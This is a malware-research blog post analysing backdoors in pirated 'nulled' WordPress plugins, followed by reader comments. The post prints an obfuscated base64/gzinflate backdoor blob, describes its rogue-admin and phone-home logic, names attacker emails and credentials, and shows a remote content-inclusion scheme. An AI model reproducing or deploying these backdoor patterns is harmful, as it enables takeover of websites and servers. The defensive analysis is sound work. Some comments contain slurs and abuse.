Unmasking “Free” Premium WordPress Plugins

WordPress has a large repository of free plugins (currently 30,000+) that can add almost any functionality to your blog. However, there is still a market for premium plugins. Premium plugins are especially popular when they help blogs make money: eCommerce, SEO, affiliate and customer management, and so on.

Such plugins may be really great and well worth their price, but not many webmasters are ready to pay for plugins, especially when they can find “free” or “nulled” versions of the same plugins on the Internet. All they need to do is search Google for [<plugin-name> free download].

Getting something valuable for free may sound great, however, in most cases, you won’t get what you expect. After all, you should ask yourself the question, why would someone spend their time to steal software, and then post it to various sites and forums where they can’t even count on any advertising revenue? Usually, the answer is that they expect to take advantage of the sites that install the software they post. How? By adding some undisclosed functionality to the stolen plugins like backdoors, ads, hidden links, and SPAM.

In this post, we’ll talk about “patched” malicious premium plugins. We’ll talk about what they do, how they work, and about websites that build their businesses around stolen WordPress themes and plugins.

SEOPressor

Price: $47+

We found this plugin while cleaning a severely infected site. It was in the wp-content/plugins/seo-pressor(gratuit) directory. Seeing gratuit itself in the directory name made the plugin look suspicious. A scan of the website revealed the following code inside the seo-pressor(gratuit)/classes/central.class.php file:

eval (gzinflate( base64 _decode("NdLJlmNQAADQX8muqo6FIKZTXV0HEUKixCybPsIzBOGZHu/ruzf9B3dxd9+/f333Zb8DS9Ls3gtcvfImmcD7IxkBd/
iTgbTLwPublZ2MEZ6RJB1vkD/yYYV8OdYhuTCXwq+1882AVrOXpUJzbr507gkxWLZRYOfc5llCsyRMdIZxv+sW6N0ICq6h6Bm/
5us1pVADcjlCnsm5tttpIWyHnzkwyMqVJTOupEbLBCE50lcVtKnLKc999/JlZDWRcO8yqve1TKRiND7ZXnsJBW5L0zwJVuFQMQmXgTPLNZnw/PCObVCZ+YO56TOih0TzlIvhqgqpH+jUUgfVXVFrVPDRk6eKdDL1aNQgr2J5wB5Z0GErnQ3muWGF6ktS9a27sYinLuRjpUrQK6GktGCw+pMNqVq84FQCnQBKqUw3vjvT6B8ZyJAgDuEcimHia1660nhruAX71qNCOBjmvMw9q6DN4ukIgufPUyQNmX9ao1YPak6p96OGzSZoj86NPlkXEWnUvSBQzJouKDYxdsKoOTDeA3sxP17dWfxxs4S8HyeWkcYWsmMYieaS2TVR0RfOgw2Xygbrv6I03xIkKlQNfGUTmj4wsOgQdvailUayKYpaL8EVwG1aJTgcMufcgbogTeEAtf1pXp6EzYiru0XYPkcCT/I6+vp623187D4+d/+L/QU=" )) );

It’s quite typical for premium plugins to encrypt and obfuscate their code. They try to prevent the stealing of their “know-hows” and algorithms, and they make it more difficult to reuse certain files outside of their plugins. We respect their right to do it, but we always try to decode such encrypted blocks to figure out whether it’s legitimate code or something added by hackers.

In this case, after a few rounds of decoding we saw this:

seopressor backdoor

There are two functions hooked to the “wp_head” event, which means that they are executed on every blog page load.

The first function, my_wpfunww7x(), creates a user called “wordpress” with the password “gh67io9Cjm” that has administrator permissions. This only happens if the page URL has the “cms” GET parameter with value of “jjoplmh“. E.g. http://blog.example.com/?cms=jjoplmh.

The second function, my_wpfunww7c8(), checks if the wordpress user exists. If there is no such a user, it sends an email to “thomasza@gmx.com” with the blog URL in the subject, and the “WordPress Plugin” in the body of the email.

It’s easy to see the logic behind these two functions:

  1. When a webmaster installs this plugin, it immediately (on the first blog page load) sends an email with the blog address to the attacker (thomasza@gmx.com).
  2. Then the attacker comes to the blog and loads it passing the ?cms=jjoplmh parameters in the URL.
  3. As a result, a new admin user (with the “wordpress” name and a known password) is created.
  4. The attacker can now log into WordPress with admin permissions and do whatever he wants with the blog, with the whole site (e.g. injecting a backdoor to some theme or plugin, and then using it to upload malicious files to the server), with the server account (all sites that share the same account can be easily compromised now) and even with the whole server.
Flat Skins Pack Extension and Restrict Content Pro

Let’s move to the next set of “free” premium plugins.

We worked with a server that sent out tons of spammy emails. We found a script that did it and deleted it. This immediately cut the mail queue by 95% but there were still quite a few emails there. When we checked the headers, we saw that most of them had only the “WordPress plugin” line in their bodies, and were sent to either “wordpressslog@yandex.com” or “jaqqscigs@gmail.com“. The headers also mentioned the sites that sent those emails, so we only needed to check plugins on those sites.

Restrict Content Pro

Price: $42+

First we found this file: wp-content/restrict-content-pro/includes/sidebar.phphttp://pastie.org/8966576 (slightly trimmed). This file contains 72,847 bytes and only one line of code that looks like some commented out code from the ” option-tree” plugin. However, if you inspect the code more thoroughly, you’ll notice the following 243 bytes in the very middle are not a comment (formatted for readability):

sidebar.php emailing site url

Looks familiar doesn’t it? The only difference from what we saw in the “gratuit” SEOPressor is a slightly different wp-head hook function name (my_wpfunww458), and base64-encoded email address ( d29yZHByZXNzc2xvZ0B5YW5kZXguY29t ), which gives us wordpressslog@yandex.com after decoding. Bingo!

But wait, this code only sends emails with the blog URL to the attacker. Where is the code that creates a rogue user? Good, you noticed it.

The code was in the wp-content/restrict-content-pro/includes/class.php file – http://pastie.org/8966599 (trimmed trailing comment). Again, 90,390 bytes of commented out, and one line of code with 288 bytes of payload in the middle, which is the missing part that created the rouge “wordpress” user.

class.php creates rogue wordpress administrator

This time it needs the ?cms=go URL parameter.

OK, now we have both malicious functions, but how does WordPress know that it needs to call them? In the case of the SEOPressor plugin, the malicious functions were injected into a legitimate plugin file that WordPress loaded when it loaded the plugin. Now we have two standalone files that have no legitimate code at all. Moreover, they don’t belong to that plugin. The answer is the attacker modified the main plugin file wp-content/restrict-content-pro/restrict-content-pro.php and added the following line of code there:

... include'includes/class.php'; include'includes/sidebar.php';
Flat Skin Pack Extension

Price: $6

Then, with minor modifications, we found similar malicious files under wp-content/ubermenu-skins-flat.

  • ubermenu-skins-flat/help/js/menu.php – sends the blog URL to jaqqscigs@gmail.com (amFxcXNjaWdzQGdtYWlsLmNvbQ==)
  • ubermenu-skins-flat/help/js/class.php – creates a rogues “wordpress” users with the admin permissions.
  • ubermenu-skins-flat/ubermenu-skins-flat.php – includes the above two files.
Origin of the “patched” plugins

When we talked with the webmaster about the origin of those “plugins”, he said that he took them from wplist.org and was surprised that he shouldn’t have trusted a site with such a cool domain name.

We checked that site and found that the plugins were submitted there by a user named andrewp in June, 2013. In total, he submitted five plugins — all of them had those malicious backdoors.

  • Restrict Content Pro WordPress Plugin V1.5.5
  • Ideas! v1.1.6 Interactive feedback and commenting system
  • Ultimate Ajax Grid WordPress Plugin
  • User Profiles Plugin for WordPress
  • UberMenu – Flat Skin Pack WordPress Plugin V1.0.3

We did a little digging and found out that the user, andrewp, has only ever posted “patched” plugins with backdoors. The question becomes, are such submissions of “patched” plugins typical for this site, or, was this just an exception that took place back in June, 2013? To figure it out, we downloaded a few random plugins from wplist.org and its mirror site wplocker.com (not sure which one is primary there though), and checked them.

It didn’t take long to find a few “patched” plugins submitted in February to March of 2014 by the site admin (not some third-party user).

  • Go – Responsive Pricing & Compare Tables (go_pricing)
  • FormCraft
  • Custom Scrollbar WordPress
  • Theia Sticky Sidebar
  • GravityForms

Our conclusion is that this practice of posting plugins containing malicious code is typical for these sites. Moreover, when in their very own comments area people warn about malicious “extras” they have found in the plugins, the admin readily replaces them with “retail” versions. Why not do it from the very beginning?.

I’m not going to link directly to that site, but you can find those comments using this Google search.

Spamcheckr patch

The “patch” has changed since last June. While the added files look the same (one long line of commented out PHP code with a short payload in the middle of the comments), they work differently. In all of them, the payload looked more or less like this (added formatting for readability):

remote file inclusion from  spamcheckr .com /l.php

The variations of this payload include different function names, different URLs in the $addressd variable (hxxp://spamcheckr .com/check.php and hxxp://spamcheckr .com/l.php), as well as the base64 encoded URL: base64_decode(“c3BhbWNoZWNrci5jb20vY2hlY2sucGhw“);

What this code does is inject content from the spamcheckr .com URL into the header of WordPress pages for users not logged in (wordpress_test_cookie not set). However, it doesn’t happen every time. The chances of an injection are 1 in 20 (mt_rand(1,20) == 1), so you might need to browse quite a few pages before you can detect it.

Adwat.ch scripts

Behind the spamcheckr URL’s we currently see these adwat.ch scripts:

<script type="text/javascript">
var adwatch_id = 234224;
var adwatch_advert = "int";
var exclude_domains = ['affiliates.playboy.com', 'elperutienetalento.com', 'skeezybabes.com', 'wp-admin', 'kamapisachi.info', 'nude', 'sex', 'porn', 'naked', 'fuck', 'cock', 'penis', 'tits', 'boobs', 'pussy', 'wp-login', 'hillaryClinton2016.com', 'mpmgworld.com', 'madeforher.in'];
</script>
<script type="text/javascript" src="http://adwat .ch/js/easylink.js"></script>

Adwat.ch is a URL shortening service that shows full-page ads that can’t be closed for a few seconds when people click on their short URL’s. Since no one likes obtrusive ads, and there are many better alternative services out there, adwat.ch shares ad revenue with people who shrink URLs using their service to encourage people to use their site. The injected code participates in the revenue sharing program with the ID 234224.

Alternative spamcheckr payloads

The injected code doesn’t have to always be that adwat.ch script. It’s being downloaded from the spamcheckr server and can be pretty much anything: benign, obtrusive or even outright malicious.

For example, some people reported that infected sites also redirected to adf.ly ads. We noticed some periods of inactivity when spamcheckr returned the following Google Analytics code:

<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-27917097-1', 'test.com');
ga('send', 'pageview');
</script>

This Google Analytics ID UA-27917097-1 also has a long history of being used in unwanted code that some plugins injected into WordPress pages. Two years ago, people reported an older GA code with that very ID being injected along with hidden spammy links.

If you think that ads and Google Analytics code doesn’t sound like a security threat, think again. For example, spamcheckr .com may eventually return some exploit code that will attack site visitors or redirect them to a malicious site.

Pirated software. Is it worth it?

Everyone knows that using pirated software is bad. Not just ethically bad. It’s stupid. Why trust people who don’t respect property, and whose business is stealing? Just ask yourself a question, where did they get so many paid software titles, and why do they give it away for free?

For some reason, many people download such plugins and use them on their sites. We see threads about this on WordPress.org forum. Note how they mention “not original“, “not official” when specifying the plugins where they found the malicious code. If you know it’s not original, why install it on your server?

It’s not always about the money. Oftentimes, it’s likely just a lack of knowledge. We’ve found these plugins on sites that made decent money for their owners, on sites that used upscale hosting solutions, and on sites with owners who were willing to pay for extra services. What makes them search for pirated plugins when they can afford paying for original plugins? What makes them install pirated plugins and risk losing site reputation through unwanted ads, redirects and malware? What makes them install pirated plugins if they may give control of their sites to hackers (via backdoors)? It is probably a lack of knowledge.

Think about what you install on your server. Any third-party software that you install can do pretty much anything with your site, and in some cases, with your server. Not all functions may be declared. Many themes and plugins consist of thousands of lines of code and it takes only one line to add a backdoor that can potentially devastate your site. So if you install a plugin or theme, you’d better trust its author and the site where you downloaded it from. On the road between the software developer and you, anyone could potentially make changes.

Please, be pragmatic. Get software only from reputable sources. If you need a plugin, try searching for a free one in the official WordPress repository. There are 30,000+ plugins there. This repository has very strict inclusion terms, and should be your only source of free plugins.

If a plugin you need is not free, then buy it directly from its developer. Don’t search for “free” copies. Don’t trust links in forums or on sites that offer something that doesn’t belong to them. If you see some really appealing plugin description with a shady download link, then try a Google search for the original version of that plugin.

And finally, do you really need one more plugin? Can you do without it? Even 100% legitimate plugins have overhead: they make your site slower, they may not get along with your existing plugins, and they may have known and unknown security holes. The more third-party software installed on your server, the more you expose your site has to potential security issues. Try to stick to a bare minimum.

Following these rules may save you a lot of troubles in the long run.

Scan your website for free:
About Denis Sinegubko

Denis is the founder of Unmask Parasites and a Senior Malware Researcher at Sucuri.

  • thebuzzard

    Great information. Makes me realize I need to be more cautious and detailed in my selection of Plugins etc.

    • LONDONISHERE

      OH DONT TELL ME!!!!! Asshole

  • http://item-9.com Jason Pelker

    Holy crap. This post scared the bejeezus out of me. I have to really question the value of each plugin I download going forward. Thanks for the hard lesson.

    • LONDONISHERE

      blow me pussy

  • Pippin Williamson

    This is a perfect example of why you should only ever obtain plugins from their original source. I, for example, am the creator of the Restrict Content Pro plugin mentioned above. The files that contained the malicious code that were described above do not exist in the plugin at all, and have only been added by the malicious person that is redistributing the plugin.

    Whether you are downloading a free plugin or purchasing a commercial one, please only ever do it from the original source. Downloading commercial plugins for free from other sources may seem inviting but, as this post shows, it can really bite you in the rear.

    • http://www.wordimpress.com/ Devin Walker

      Yes, it should be mentioned loud and clear that there’s no such thing as a legitimate “free” premium plugin. If you’re not purchasing the premium plugin from the official store/developer then 99% of the time there will be some malicious code in the plugin (and theme). It doesn’t matter if you get it from a torrent site or another site… the people that put this code out there are doing so most likely for malicious reasons.

  • http://www.rhyswynne.co.uk/ Rhys

    A point well worth reiterating, thanks Denis.

    There’s a “free” version of my free plugin doing the rounds (not on the repository), that every email captured through it also gets sent to another email list belonging to the hacker. Was not fun, as unfortunately with all these plugins they still look at the original author as support. So a hacked plugin could harm reputable developers reputation, which is sad.

  • RaviJayagopal

    Great post, guys. There are several nulled versions of our own commercial plugins floating around the web.

    Youtube in particular is notorious for hackers trying to distribute such versions, by posting a completely irrelevant video along with a link to the nulled version in the video’s description. We have fought long and hard trying to get these links taken down, only to see many more come up every day. It’s a losing battle, for sure, but we keep on keeping on.

    But at the end of the day, we know that anyone who uses these nulled versions eventually does come back to us to buy the legit version, because usually, the guy who “sold” them a nulled version of our plugin for “a fantastic deal” disappears, their site gets flooded with pr0n and spam links, or eventually things break so bad, that they realize their mistake and end up buying a legit copy. Many even ‘fess up to their mistake most of the times because even after they upload the legit version, it may not work because the nulled version screwed up the database so bad that it is practically unrecoverable. And they lose all data, and end up starting from scratch.

    So I guess there is kind of a “poetic justice” here, but an article like this should go a long way in discouraging those explicitly seeking out nulled scripts and plugins instead of either going with free ones from the WordPress repository, or buying a legit copy of the software. So thank you for highlighting the aftermath of such poor choices.

  • http://www.Evan-Herman.com Evan

    Perfect example of why you should be paying developers for their hard work and time in developing plugins. Think about the amount of time it took to create the plugin, and then consider the amount of time it’s going to save you as a user.

    I see no reason not to pay a developer for their software and time in developing that plugin.

    • LONDONISHERE

      Ur on ur way to heaven :)
      Bastard.

  • http://codeangry.com/ Claude “CodeAngry” Adrian

    Are these downloaded from their official sources or warez sites?
    Such injections are inherent for warez sites and possible (as in probable) for official sites.
    — Moral of the story: FREELOADERS ALWAYS PAY! (insert evil laughter here)

  • http://mightyminnow.com Mickey Kay

    Good article, and great reminder. One question: are you confident that first eval() snippet came with the plugin? I can’t seem to find a free version of the SEO Pressor, which made me wonder if this code wasn’t inserted just because the site got hacked. Thoughts?

    • Denis Sinegubko

      It’s not the result of a hack. The plugin was not official (gratuit) and the injected code does the same thing as what we found in other “patched” plugins. It definitely came with the repackaged pirated version of SEOPressor.

      Moreover, the logic of that code (emailing blog URL and subsequent creation of a new admin user) makes absolutely no sense if it was added by a hacker – hackers already know the site URL and they can create any WP users if they can modify plugin files – no need to do it the hard way.

    • DanielTanKH

      Mickey you are right. There are hackers injecting and cracking SEOPressor plugin.

      My advise is, do not download free/cracked SEOPressor.

      SEOPressor works off our API server and cracked version of SEOPressor will not work. Only genuine copies of SEOPressor will receive response of analysis from our server.

      Daniel

  • http://www.wpcustoms.net/ Gerald@WPcustoms

    If it’s not from the WordPress repository or from the authors envato site or own website, chances are high that there is something wrong with it when the provider is some uber-cool blackhat marketing blog providing the files through hotfile or similar storage services…money saved at the wrong end!

  • http://chrislance.net/ Chris Lance

    SEOPressor has been doing this for years there has been many discussions over this on countless forums.

    It goes to show you though be careful what you download.

    • DanielTanKH

      Chris, nope.

      SEOPressor, the genuine version, does not contain the malicious codes.

  • DanielTanKH

    I would like to reach out to you that SEOPressor does not contain the codes you mentioned in your post.

    You should verify with SEOPressor’s team before posting false information on the web, Securi is a brand, and at SEOPressor, we use Securi as well on our blog.

    The client you are discussing must have downloaded/used a cracked version of SEOPressor, which was injected. The genuine copy of SEOPressor runs off our API server for it’s feature deliveries and do not contain the malicious codes as you presented.

    SEOPressor is a VERY popular SEO plugin, it does make sense that attackers are injecting and issuing fake plugins as SEOPressor is highly searched.

    I hope you keep an update to this or reach me out to discuss further.

    Again, SEOPressor does not contain the malicious codes you mentioned.

    Daniel Tan
    SEOPressor Team

    • John McClane

      Man, are you blind??? He was talking about nulled versions of your plugin. Haven’t you read the whole article???

      • http://yourswithbutter.com Tammi L. Coles

        See the comment from Chris Lance. Unfortunately, article skimming means that some may walk away from this piece misunderstanding where the cause lies. Like you, I believe the fault (hackers, black hatters, etc.) is clear, but if both Chris and Daniel have misunderstood there’s room for additional clarification.

        So, again, I appreciate the voices of those creating the commercial plugins. (Thanks for your products and thanks for taking the time to speak with your buyers.)

      • DanielTanKH

        It is necessary. We are getting tickets to explain this blog, so I have to clarify right here. You can be more respectful in public.

    • LONDONISHERE

      Youre way to dumb to read the whole fucking article u bastard or what?! I would expect you to be clever since youre the owner of SEOpressor

  • LUCIANO

    GRACIAS POR LA INFORMACION, ES DE VALIOSA UTILIDAD

    • LONDONISHERE

      TELOSICO PUTO

  • http://sevenspark.com Chris – SevenSpark

    Thanks for the good article, this is really important for consumers to understand and something that many are not aware of.

    I’m the creator of UberMenu and I just wanted to chime in and confirm that the exploit mentioned in the article regarding UberMenu Flat Skins Extension is absolutely NOT part of the official code sold on CodeCanyon – in fact, the files containing that code do not even exist in the official plugin. The malicious code has been added after the fact by the user mentioned in the article, and is not something created or approved by SevenSpark. SevenSpark plugins don’t contain any backdoors or phone-home code.

    I just wanted to assure customers that these security vulnerabilities are not present in the official plugins purchased from and distributed by SevenSpark/CodeCanyon, as I’ve had some concerns raised on that point from confused customers as a result of this article.

    Thanks guys and keep up the great work!

    • John McClane

      I completely don’t understand what’s the point of your voice here??? Only someone stupid would think of your plugin containing such a vurnabilities after reading of this article. So wtf with your explanations here??

    • http://yourswithbutter.com Tammi L. Coles

      Thank you for taking the time to speak here about your product. Good to see that someone with UberMenu is concerned enough (1) to scan news on the brand’s product from users and (2) to step in with assuring information.

  • http://bloggingpark.com/ Manas Kabiraj

    that’s most embarrassing,I only use free plugin,now have think about it.thanks.

  • lfx

    Great article!! Thank you :)

  • John McClane

    Well, let’s look at it from another pespective. Nowadays hacker’s actions are very often not noticable. They know they should keep low profile. Of course probably they use our assets but the moment we notice them they will be cut off our site. I mean their actions don’t destroy our websites – they try to “cooperate” with us. I use “free” copys since 5 years or more and never ever had any trouble with them. The websites still exist and work like a charm. A few of my friends also use them and had no issue at all so overall it’s not as scary as it seems.

    • LONDONISHERE

      ure so clever! Five claps…. on ur ass

  • Srikar

    cant believe SEO Pressor is in the list, now WordPress is more about making money than blogging
    Thanks for the information

    • LONDONISHERE

      Shut up faggot

  • Todd Lahman

    100% agree. Only buy premium plugins from the developer, or an official store the developer has partnered with. In other words a trusted source, not just anyone who got their hands on the premium plugin and distributes it for free, or for a much smaller fee, like so many sites selling so called “official” premium WooCommerce extensions. Cleaning up a hacked blog, and your reputation, is very costly. It’s not a bad idea to ask the developer if a store selling his/her premium plugin is selling the official version. It only takes one bad experience to realize trust is something that should be earned.

  • Download New Songs

    thank you

    • LONDONISHERE

      ur welkommen

  • Guest

    Did you

  • George K

    Did you reported those “gmail” addresses to Google so they will be banned ?

  • banquo

    This happened to me! A colleague sent on a plugin I’d asked him to grab from ThemeCanyon – turns out he got it from some site. Sure enough, it was the pharma hack and fucked with all our snippet data.

    And who fixed it for us, superfast? Sucuri.

  • http://www.fitwp.com Rilwis

    This is a really good read for me, Must admit that you are one of the best bloggers
    I ever saw.Thanks for posting this informative article.